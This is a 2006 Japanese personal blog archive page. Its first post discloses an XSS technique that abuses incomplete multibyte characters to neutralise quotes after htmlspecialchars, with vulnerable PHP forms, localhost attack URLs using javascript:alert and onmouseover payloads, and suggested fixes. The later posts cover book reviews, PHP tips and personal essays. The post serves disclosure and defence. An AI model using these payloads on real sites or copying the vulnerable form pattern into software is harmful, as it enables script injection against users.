2006年03月の記事

かなりヤバめなXSS的攻撃方法が見つかりました。詳細は以下のリンク先をご覧下さい。

• 文字コード（SJIS）とHTMLエンコードとCross-Site Scriptingの微妙な関係
• 文字コードとHTMLエンコードとCross-Site Scriptingの微妙な関係 (EUCの場合、UTF-8の場合)

何がヤバいのかというと、この攻撃方法に対する根本的対策がほとんどのサイトで行われていないと思われるからです。

今までCross-Site Scripting脆弱性への対策はHTMLで使われる文字列を実体参照に変換するのが基本でした。しかし、マルチバイト文字列の仕様を突いて半端な文字列を送信しクオート文字を無効化（escape）することで、実体参照に変換されていてもスクリプトの実行が可能なケースがあることが判明したのです。

ちなみにまだ名前が無いみたいなので「Escape Based Cross Site Scripting」と題して「EBCSS」と呼ぶことにします。攻撃可能な条件が厳しめですがゼロでは無いので、この名前を使って認識が広まってくれることを願います。（もし既に名前が存在してたらすみません）

PHPで脆弱性のあるコードの例は以下のようなコードです。

<!--シングルクォートとダブルクオートを併用しているケース-->
<form>
text: <input type='text' name='text' value="<?php echo htmlspecialchars($_GET['text']) ?>"><br>
text2: <input type='text' name='text2' value="<?php echo htmlspecialchars($_GET['text2']) ?>"><br>
<input type=submit value="送信">
</form>

<!--ダブルクォートだけでも攻撃可能なケース-->
<form>
text: <input type="text" name="text" value="<?php echo htmlspecialchars($_GET['text']) ?>"><br>
text2: <input value="<?php echo htmlspecialchars($_GET['text2']) ?>" type="text" name="text2"><br>
<input type=submit value="送信">
</form>

<!--攻撃用URL SJIS用 IE限定-->
<p>http://localhost/break_quote.php?text=text%81&text2=%20style%3dbackground:url(javascript:alert('xss'))%20%81</p>

<!--攻撃用URL EUC用 IE限定-->
<p>http://localhost/break_quote.php?text=text%A1&text2=%20style%3dbackground:url(javascript:alert('xss'))%20%A1</p>

<!--攻撃用URL UTF-8用 IE限定-->
<p>http://localhost/break_quote.php?text=text%E1&text2=%20style%3dbackground:url(javascript:alert('xss'))%20%E1</p>

<!--攻撃用URL UTF-8用 ブラウザ非限定-->
<p>http://localhost/break_quote.php?text=text%E1&text2=%20onmouseover=alert('xss'))%20%E1</p>

今のところ、攻撃できそうにないコードは以下のような例です。しかし、タグはしっかり壊れるので安心はできません。

<!--２つのパラメータの間に " が存在すると攻撃できそうにない（安心は禁物）-->
<form>
text: <input type="text" name="text" value="<?php echo htmlspecialchars($_GET['text']) ?>"><br>
text2: <input type="text" name="text2" value="<?php echo htmlspecialchars($_GET['text2']) ?>"><br>
<input type=submit value="送信">
</form>

肝心の対策は、以下が有効かもしれないようです。（文字コードとHTMLエンコードとCross-Site Scriptingの微妙な関係 (EUCの場合、UTF-8の場合)より）

• URLエンコードしとけ？
• 属性値は全部同じもの「"」か「'」括っておく？（表示は崩れる）
• Perlの場合はencode('sjis', decode('sjis', $query->param('text')))ってすると半端モノ消える（教えてもらった）
• phpの場合はhtmlspecialchars(mb_convert_encoding($_GET{'text'},'SJIS','SJIS'))ってすると半端モノ消える（教えてもらった）

とかそこらへん？

今のところ攻撃可能な条件が厳しめなものしか見つかっていないので、攻撃可能なサイトがすぐに見つかるわけではなさそうだと感じました。私自身が開発に携わったサイトやその他のサイトで脆弱性がないか探してみたところ、タグを壊すのが精一杯でした。しかし、タグを壊すことで何か他のことが可能になるケースもあるかもしれません。入力値をJavaScriptで利用する場合も危なそうです。なので、未然に防止するための機構を早急にに導入すべきかと思われます。対策例の半端モノを消す方法が良さそうな感じです。

また、GETではなくPOSTの場合はどうなのか？という点が気になります。試しにIE用の以下のような攻撃コードを書いてみましたが、HTML自体が壊れてしまうようで攻撃できませんでした。ただし、もっと調べれば攻撃可能かもしれません。

<!--受け取り側がpostの値を利用している場合の攻撃サンプル（動作しません）-->
<form action="http://localhost/break_quote.php" method="post" onsubmit="this.text.value = unescape('%81');this.text2.value += unescape('%81')">
<input type="hidden" name="text" value="">
<input type="hidden" name="text2" value=" style=background:url(javascript:alert('xss')) ">
<input type="submit" />
</form>

ちなみにクォート無しで属性を記述してしまっている場合はescapeしなくても属性を追加できてしまうので論外です。以下サンプル。

<!--問答無用に攻撃可能なケース。Attribute Append Cross Site Scriptingって感じ？てか、属性をクオートで囲まないこと自体がありえない-->
<form>
text: <input type=text name=text value=<?php echo htmlspecialchars($_GET['text']) ?>><br>
<input type=submit value="送信">
</form>

<!--攻撃用URL IE限定-->
<p>http://localhost/break_quote.php?text=%20style%3dbackground:url(javascript:alert('xss'))</p>

2006-03-30 written by akiyan　|　記事　|　固定リンク　|　コメント (2)　|　トラックバック (1)　|　

顧客と語らえ! クイジング入門
このサイトから 2人 が購入しました
全体で 2人 がクリック

posted with amazlet on 06.03.23

弘中 勝
現代書林 (2005/09/14)
売り上げランキング: 993

おすすめ度の平均:

双方向のコミュニケーション
一億総コンサルタントの一人
稀に見る、繰り返し読みたくなるビジネス書

Amazon.co.jp で詳細を見る

これはクイズ本ではない。タイトル中の「クイジング入門」のインパクトが強いからどうしてもそう思ってしまいがちだが、違う。著者が最も伝えたいのは顧客との良質なコミュニケーションをとることの大切さである。その証拠に表紙では「顧客と語らえ！」が最も強調されている。ただ、だからといってクイズについての内容が乏しいわけではない。

著者は巷に溢れる安易なクイズの何がいけないのかを的確に指摘している。誰でも見たことがある安易な穴埋めクイズや誰でもわかる簡単すぎるクイズは意味が無いという。

安易なクイズは答える側からしてみれば何の得もない。クイズに答える面白さもなく新しい知識を得ることもない。それでも懸賞賞品目当てで機械的に答える人は沢山いるので一時的に人は集められる。だが、はたしてそれで顧客に何か印象を残せるのだろうか。著者の答えは否だ。

ではどんなクイズなら顧客に印象を残せるのか。キーワードは「知的好奇心」だ。クイズに答える人の知的好奇心をくすぐるような、ちょっとひねったクイズが例として挙げられている。たとえば正解が富士山のクイズでは悪い例が「日本で最も標高が高い山は？（正解：富士山）」であるのに対し良い例は「日本一高い富士山と、オーストラリア大陸で最も高いコウジスコ山。高い山はどちらでしょう？（正解：富士山）」といった按配だ。顧客はこのクイズに答えることで富士山が世界的にも標高の高い山という知識が得られる。こういったクイズのあとに富士山に関連した商材を紹介すれば顧客の印象に残り易い。

顧客を満足させる。その手法の一つとして良いクイズは有効だと著者は言っている。悪いクイズには自社本位の精神が映し出されている。会社の名前を覚えて欲しい、新商品の名前を知って欲しい。欲しい。欲しい。etc ... こんな精神からは良質なクイズや良質なコミュニケーションは生まれないだろう。悪いクイズが生まれる根底には強すぎる自社本位の精神があるのだ。

本書では中小企業の社長がウェブサイトを使ったプロモーションに失敗し、悩み、改善していく物語が全体の軸になっている。また、顧客と良質なコミュニケーションをとるための方法について多くのページが割かれている。

「自社本位の精神を捨てよ。顧客と語らえ！」

クイジングを通してこのことが強く伝わった一冊だった。

2006-03-30 written by akiyan　|　レビュー　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

アニメ「攻殻機動隊 S.A.C.」の続編が製作決定 －TV/映画/OVA「媒体は未定」。アニメフェアで映像公開

アニメ「攻殻機動隊 STAND ALONE COMPLEX Solid State Society」の製作を決定したと発表した。2006年夏の完成を目指しており、公開媒体は未定。

やっときたーーーーー！！待ち望んでました！！！

2006-03-21 written by akiyan　|　記事　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

naoyaグループ - naoyaの日記 - シリコンバレーの給与水準より。

渡辺さんの話。初めて聞いたときは額の高さに結構びっくりすると思うんだけど。でも、税金が日本よりやたら高いのと、シリコンバレーは不動産がすげえ高いんだってのをお忘れなく。僕も正確な数字は知らないけど。

その辺差し引くと日本の給与水準よりちょっと良い、ぐらいなんじゃないかな。

私もそう思います。アメリカは税金がやたら高いみたいですね。アメリカで給料をもらっている日本人の方々は口を揃えて言ってました。車にかかる維持費もかなりのものです。

あと、日本、特に東京と比べてシリコンバレーの生活が楽しいかどうかは人によると思う。夜は早いし移動は全部車だし、遊ぶところがあんまりない。

これ、すごく頷けます。最近になって東京が世界的にみていかにエンターテインメントな街かということを、2ヶ月間カリフォルニアのベイエリアで生活してみてよくわかったんで。同じ先進国でもここまで違うのかと。夜は早いからゆっくり飲みに行けないし、週末は車で食料の買い出しに行かなきゃならない。東京に比べて遊び的な要素が圧倒的に少ないんです。なので、楽しいかどうかは人によるというのは、かなりあると思いました。

ご飯も平均的には日本の方が圧倒的においしい。

日本の食はほんとうに素晴らしいです。「アメリカはめしがまずい」とは聞いていたけど、生活してみてよくわかりました。日本にいたときはランチの店選びで「どこがおいしいか」で悩むことはあったけど、アメリカだと「どこがまずくないか」で悩むんですよ。しかもサンフランシスコは物価が高いので「高くてまずい」という最悪な結果になることもちょくちょくあります。あまりにひどいので、弁当作って持って行くときもあるようになりました。ちなみに本当に高価なお店にいけばおいしいし、食材も高価なオーガニック系のものはおいしいです。

で、ここまで日本びいきのアメリカ批判みたいなこと書きつづりましたが、結局一番重要なのは

それより大事なのはエンジニアがえばれるってことだ。企画の人間がエンジニアをアゴで使ったりとかそういうのがないのが重要でしょ。金じゃないよ金じゃ。

これだと思うので、これで他の不満が打ち消されるならアメリカでエンジニア業をやるのは悪くないと思います。

2006-03-16 written by akiyan　|　記事　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

私が見て気になったページをakiyan.com : 読書記録にて公開していくことにしました。Feedも用意しましたので、常時追っかける場合はフィードリーダーでどうぞ。

ちなみにはてブのデータをもとにしています。

2006-03-16 written by akiyan　|　お知らせ　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

百式の田口さんが素晴らしいアイデアを公開しました。

いつも使っているLifehacksに、「何かをやめたいときにはそれをするのがより困難になるように仕込むべし」というものがあります。

具体的なステップは4つ。

1. やめたいことを定義する
2. そのやめたいことをすることが現在どれだけ困難か、1から10で判断する
3. その困難度を1あげるためには何をすればいいか考える（thinking time!）
4. そのとおり実行する

何かをやめたいときにはそれをするのがより困難になるように仕込むべしより

具体的な例として、空き時間についつい見てしまうサイトをブックマークからわざと消して、アクセスしにくくしてしまうなどです。なるほど！と思いました。本当に時間を有効に使いたいなら何でもかんでも便利にすりゃいいってもんじゃないんですよね。キーワードは集中力。集中力を持続させることで効率を上げようという意図です。私のブラウザは、はてブとmixiとフレッシュリーダーが１発でアクセスできるようになっていました。でもこれらのコンテンツは集中力を失ってまで１日何回も見る必要のないものです。

今まで合理主義一辺倒で環境を整えてきましたが、１日１回見れば十分なものへのアクセス難度は上げようと思いました。逆にもっとアクセス難度を下げようと思ったのはツール類へのアクセスです。ブックマークレット、各種検索サービス、仕事のグループウェア、仕事のバグトラックページなど。本当に頻繁に使う必要のあるものだけアクセスし易くしようと思います。

ちなみこれはPC以外の何にでも有効だと思いました。例えば、私はよくお菓子を食べるのですが、このあいだ掃除していてなんとなくおかしの袋を戸棚へしまいました。すると、それからあまりお菓子を食べなくなりました。減らさないとなあ、と思っていて実行できてなかったのですがアクセス難度を上げるだけでいともかんたんに実行できてしまっていたのです。ゲーム、テレビ、ラジオ、漫画などなど、集中力を奪ってしまうものすべてにこのライフハックを適用すると、やりたいことがどんどんやれるようになるかもしれません。完全に捨ててしまうわけではないところがミソですね。

これらは捨てる技術に通ずるところがある話です。最後におすすめの整理本を紹介して（アサマシして）おきます。

まずは風水整理術。キーワードは「良いエネルギー」と「悪いエネルギー」。この原則さえ覚えてしまえば細かいHow Toは不要になります。風水といっても「黄色い物を部屋のどこそこにどうこう」なんて話ではありません。もっとおおざっぱで「見るたびにちょっとでもいやだなと思うものを取り除き」「見るたびにちょっとでも楽しくなる物を揃える」ことがいかに大事かという話です。またこの本によってある友達の人生が良い方向へ大きく転換しました。万人におすすめしたい本です。

ガラクタ捨てれば自分が見える―風水整理術入門
このサイトから 6人 が購入しました
全体で 24人 がクリック

posted with amazlet on 06.03.12

カレン・キングストン 田村 明子
小学館 (2002/04)
売り上げランキング: 205

おすすめ度の平均:

明日もいらなくなった本を売りに行く予定!
すでにキレイ好きの人がもっとキレイ好きになる本
これからにわくわく！

Amazon.co.jp で詳細を見る

お次はファイリング整理術の超整理法。キーワードは「破綻しないこと」。超整理法だけではなく、いろいろある整理法のメリットとデメリットが分かりやすく説明されています。どの整理法をどんなときに使えば効果的かが理解できるのでかなりオススメです。

「超」整理法1 押出しファイリング
このサイトから 1人 が購入しました
全体で 4人 がクリック

posted with amazlet on 06.03.12

野口 悠紀雄
中央公論新社 (2003/05/23)
売り上げランキング: 38,898

おすすめ度の平均:

古びない押し出しファイリングだが、改訂の意図は？
自分なりの整理の刺激に

Amazon.co.jp で詳細を見る

2006-03-12 written by akiyan　|　記事　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

PHPのmb_encode_mimeheader関数で文字列をエンコードするときは、直前にmb_internal_encoding関数で変換したい文字列のエンコーディングをセットしてから呼ばないとうまく動作しないもよう。エンコードした文字列の後ろのほうが化け化けになってしまう。例えば「ご登録いただきありがとうございます」が「ご登録いただきありがH$&$4$6$$$^$9」というふうに。

回避例として、以下のように書く。

// 元のエンコーディングを保存
$orgEncoding = mb_internal_encoding();
// 変換したい文字列のエンコーディングをセット
mb_internal_encoding($targetEncoding); 
// エンコーディング実行
$encodedString  = mb_encode_mimeheader($targetString, $targetEncoding, 'B', "\n");
// 保存しておいたエンコーディングに戻す
mb_internal_encoding($orgEncoding); 

PHPのバージョンは5.1.2。

2006-03-11 written by akiyan　|　記事　|　固定リンク　|　コメント (0)　|　トラックバック (3)　|　

昨日の日本時間10時ごろからakiyan.comの転送量が急激に上がりました。javascriptのアクセス解析に大きな変化はみられないのでリッチクライアントがアクセスしているわけではなさそうです。

最新の状態は落ち着いたように見えますが今までの平均値の約2倍になっています。かなり異常なのでapacheのログを解析してみたところ、RSS独自配信で配信しているフィードへのアクセスが急激に増えたことが判明しました。ホストはいくつか限られており、１秒間に数回(!)断続的にアクセスしてくるホストがありました。おそらく、あるサイトがブログパーツか何かでこちらのRSSを読み込んで表示しているのでしょう。で、そのサイトのページビューが急激に増えたことでRSSへのアクセスも急激に増えたのではないかと推測します。

こういう状況はRSS吐き出しサービスやブログパーツを提供していればふつうにあり得ることです。マッシュアップされそうなWebサービスを提供するときは本サービスへの影響が出にくいような負荷分散構成にしておかないと、大きなリスクを抱えることになりそうです。よい教訓になりました。

2006-03-09 written by akiyan　|　記事　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

なぜか生理的に引くところがあるけど、すごいです。ヨタヨタしつつも転ばない。砂利でも雪でも歩いていける。すごい。モーター音が無くなったらもっと気持ち悪いかも。

2006-03-06 written by akiyan　|　記事　|　固定リンク　|　コメント (5)　|　トラックバック (1)　|　

フィードリーダーをサーバーインストール型なRSSリーダー、フレッシュリーダーに乗り換えてしばらく経ちました。大きなバグもなく、とても快適です。正式版がリリースされたとのこと。

願わくば、以下の機能が実装されることを！

• キーワードを登録しておくと、購読しているフィードからヒットしたエントリを集約したフィードを作ってくれる。新着だけでも。
• 10件単位で読む機能。いっぺんに読むのが辛いときって、ちょくちょくあります。

(注) このエントリはブロガーライセンスの適用を受けるためのものです。

2006-03-02 written by akiyan　|　記事　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

脊髄反射的に書く場としてakiyan.com管理人メモというブログをはてなダイアリーで運用し始めました。とくに深い考察やコラムなどは書きませんが、私の思考の断片を晒していますので興味ある方はどうぞ。

2006-03-02 written by akiyan　|　お知らせ　|　固定リンク　|　コメント (0)　|　トラックバック (0)　|　

PHPのコーディング規約の話。コードのスタイルは人によって様々で、共同作業のときは最低限のルールを定めて作業を行います。ただ、array()の中身については規定されないことが多くて人のコードをいじるときに困ることがよくあります。ひょっとして他の現場でも同様な問題を抱えているのではないかと思いましたので、私のオススメの書き方を晒してみます。

// 単純な配列
$value = array(
  'value1',
  'value2',
  'value3',
);

// 連想配列
$value = array(
  'key1' => 'value1',
  'key2' => 'value2',
  'hogehoge' => 'value3',
);

// 配列の配列
$value = array(
  'key1' => 'value1',
  'key2' => 'value2',
  'hogehoge' => array(
    'foo',
    'bar',
    'hoge',
  ),
);

この書き方の利点は、要素がすべて行単位で独立しているということです。コピペしやすく、行の入れ替えが容易です。最後の要素にもカンマがついているのがミソです。実は、var_exportで出力される結果と同じだったりします。

その他よく見かける例としては以下のような書き方がありますが、私はどれも推奨しません。変数の長さにインデントが影響されるからです。またエディタにおいて２行目の書き始めにエディタの自動インデントがききません。最初か最後の要素を移動しようとすると行単位でコピペできないのも不便です。

// インデントを「(」を基準にしている。
$value = array('value1',
               'value2',
               'value3');

$value = array('key1' => 'value1',
               'key2' => 'value2',
               'hogehoge => array('foo',
                                  'bar',
                                  'hoge));

// インデントを「=」を基準にしている
$value = array(
           'value1',
           'value2',
           'value3'
         );

// 横に並べる
$value = array('value1', 'value2', 'value3');

2006-03-02 written by akiyan　|　記事　|　固定リンク　|　コメント (1)　|　トラックバック (1)　|　

ウェブ進化論で梅田さんは言う。Googleの中の人たちは、世界をよりよいところにすることがミッションだと感じて日々研究開発を行っていると。

それはたぶん本気だと、私は思う。

Googleの中の人たちはみんな優秀だ。Google以外のどこへ行っても十二分な収入を得られる能力を持った人たちで、近い将来のお金の心配がまったく無い人たちだ。これは人生においてかなりの幸福を手にしているといえる。そして研究開発が好きだ。余分なお金と研究開発する機会を選べと聞かれれば、たぶん、9割以上が研究開発を選ぶ人たちだと思う。Googleにいればその好きな研究開発を存分に行うことができる。そしてGoogleで研究開発をしている限りはお金も同時についてくる。

十分な収入を得られて、やりたいこともやれる。どんなに幸せなことだろう。

私は思った。Googleの中の人たちは十分幸せだからこそ、Googleという会社を通じて世の中に利益（幸せ）を還元しようとしているんじゃないかと。

世の中に利益を還元しようとする行為は何も大げさな事じゃない。身近な例として、恋愛中の人を例にあげてみよう。

恋愛がとてもよい状態にあるとき、人は他人に対して妙に優しくなることがよくある。自分が幸せでいっぱいだと、幸せが溢れて他人も幸せにしたいと思う気持ちが働くんだと思う。それは自分の幸せをさらに大きなものにするためでもあるけど、結果的に他人が幸せになれば文句なしだ。

行動原理が同じなら、十分に幸せなGoogleの中の人たちが世界をよくしようと思うのは自然な流れだと思う。

ちょっと話がそれるが、本当のお金持ちは信じられないほど気前が良い。最近では任天堂の元社長の山内博氏が以前に世話になった病院に70億円を寄付した例がある。そのことについて気になるコメントを見かけた。「山内氏は、収入を税金で持ってるいかれるくらいなら自分の関係のある病院に寄付していざというときにのために...といった気持ちで寄付したんだろう」といったものだ。これはちょっと失礼な想像だ。山内氏は、純粋に自分を助けてくれた人たちや社会のために利益を還元したくて寄付をしたんだと思う。

ちなみにこういった幸せや寄付の話に対して周りが「偽善だ！」と反応している例を多く見かけるが、「偽善だ」と言うことで何を批判しているのかよくわからないことが多くて閉口する。たぶん悪気は無くてそう言いたいだけなんだと思うけどね。

ウェブ進化論 本当の大変化はこれから始まる

posted with amazlet on 06.03.01

梅田 望夫
筑摩書房 (2006/02/07)

Amazon.co.jp で詳細を見る

2006-03-01 written by akiyan　|　記事　|　固定リンク　|　コメント (3)　|　トラックバック (0)　|